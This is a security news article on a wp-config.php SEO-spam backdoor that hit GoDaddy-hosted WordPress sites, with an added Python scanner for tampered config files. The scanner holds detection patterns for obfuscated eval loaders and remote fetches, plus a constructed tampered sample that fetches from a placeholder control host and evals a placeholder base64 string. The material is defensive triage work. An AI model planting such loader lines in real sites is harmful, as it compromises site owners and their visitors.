Experts discovered that multiple WordPress sites using GoDaddy Managed WordPress hosting were infected with the same backdoor. The issue affected major resellers including MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress.
The problem was noticed by Wordfence analysts on March 11, who report that 298 sites per day were being infected with the backdoor, 281 of them hosted by GoDaddy.
The backdoor itself is an old Google SEO poisoning tool dating back to 2015. It is implanted in wp-config.php, fetches spam link templates from a command-and-control server, and then uses them to inject malicious pages into search results.
Most of these templates are pharmaceutical spam, and they are served to visitors of the hacked sites in place of the real content. The apparent goal is to lure victims into buying fake products, so that they lose money and hand their payment details to the attackers.
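Because the backdoor lives in wp-config.php, a file whose legitimate contents are small and highly predictable, a defender can triage many hosted sites quickly by scanning that file for things it should never contain: any executable code after the final `require_once ABSPATH . 'wp-settings.php';` line, obfuscated `eval()` calls, or fetches from remote URLs (which is how a template-pulling backdoor reaches its control server). The script below is an added example written for this article, not code from Wordfence or GoDaddy; its rules are generic PHP-backdoor heuristics and the two wp-config.php samples are constructed, with a placeholder `c2-host.invalid` URL and a placeholder base64 string rather than any indicator from the incident.

```python
"""Heuristic scanner for tampered wp-config.php files (added example, constructed samples)."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Generic indicators of PHP backdoors dropped into wp-config.php.
# Assumption: these are well-known heuristics, not signatures from the GoDaddy case.
SUSPICIOUS_PATTERNS = {
    # eval() wrapped around a decoder is the classic obfuscated loader
    "obfuscated_eval": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # pulling content from a remote URL is how a template-fetching backdoor phones home
    "remote_fetch": re.compile(
        r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    # include/require of a variable-controlled path (legit wp-config uses the ABSPATH constant)
    "dynamic_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*\$", re.I),
    # include of a hidden dot-file, a common place to stash the real payload
    "hidden_file_include": re.compile(
        r"(include|require)(_once)?\s*\(?\s*['\"][^'\"]*/\.[^'\"/]+\.php['\"]", re.I),
    # a long base64 literal has no business in a config file
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

COMMENT_PREFIXES = ("//", "#", "/*", "*", "?>")


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    snippet: str


def scan_wp_config(source: str) -> list[Finding]:
    """Return every heuristic hit in the given wp-config.php text."""
    findings: list[Finding] = []
    saw_settings = False
    for line_no, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        # A stock wp-config.php ends with the wp-settings.php require; anything
        # executable after it was appended by someone other than the site owner.
        if saw_settings and stripped and not stripped.startswith(COMMENT_PREFIXES):
            findings.append(Finding("code_after_wp_settings", line_no, stripped[:80]))
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(rule, line_no, stripped[:80]))
        if "wp-settings.php" in line and re.search(r"\brequire(_once)?\b", line):
            saw_settings = True
    return findings


def is_suspicious(source: str) -> bool:
    return bool(scan_wp_config(source))


# Constructed sample: a minimal, clean wp-config.php (fake credentials).
CLEAN_CONFIG = """<?php
define( 'DB_NAME', 'example_db' );
define( 'DB_USER', 'example_user' );
define( 'DB_PASSWORD', 'not-a-real-password' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""

# Constructed sample: the same file with two lines appended, mimicking a
# template-fetching loader. The URL and base64 string are placeholders.
TAMPERED_CONFIG = CLEAN_CONFIG + """$tpl = file_get_contents('http://c2-host.invalid/spam-template.txt');
eval(base64_decode('UExBQ0VIT0xERVI='));
"""


def main(argv: list[str]) -> int:
    """Scan the file given on the command line, or the built-in samples if none."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            samples = {argv[1]: fh.read()}
    else:
        samples = {"clean-sample": CLEAN_CONFIG, "tampered-sample": TAMPERED_CONFIG}
    worst = 0
    for name, text in samples.items():
        hits = scan_wp_config(text)
        print(f"{name}: {'SUSPICIOUS' if hits else 'clean'} ({len(hits)} finding(s))")
        for f in hits:
            print(f"  line {f.line_no:>3} [{f.rule}] {f.snippet}")
        worst = max(worst, 1 if hits else 0)
    return worst


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with a path to a site's wp-config.php to get a non-zero exit status when anything is flagged, which makes it easy to loop over every site on a reseller account. The `code_after_wp_settings` rule is the most robust of the set, since it depends on the structure of a stock wp-config.php rather than on the attacker's choice of obfuscation; the pattern rules catch the common loaders but should be treated as a triage aid, not proof of compromise.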
The vector of this mass attack has not yet been determined, but what is happening looks very much like a supply chain attack. It is worth remembering that in December 2021 GoDaddy suffered a data breach that affected 1.2 million of the company's WordPress customers, among them the Managed WordPress hosting resellers mentioned above. It can be assumed that the two incidents are related and that we are now seeing the consequences of last year's leak.